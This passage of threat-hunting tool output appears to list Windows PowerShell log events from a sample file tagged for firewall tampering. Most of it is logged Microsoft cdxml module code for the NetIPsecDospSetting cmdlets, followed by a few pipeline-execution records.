$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name 
= 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = 
${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_valu,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.444 
+09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"e; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; 
ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', 
$__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' -Alias '*' function Remove-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null 
$__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"e; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' -Alias '*' function Remove-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 
($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.445 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.449 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.450 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecDospSetting"" 
ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.450 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.451 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" 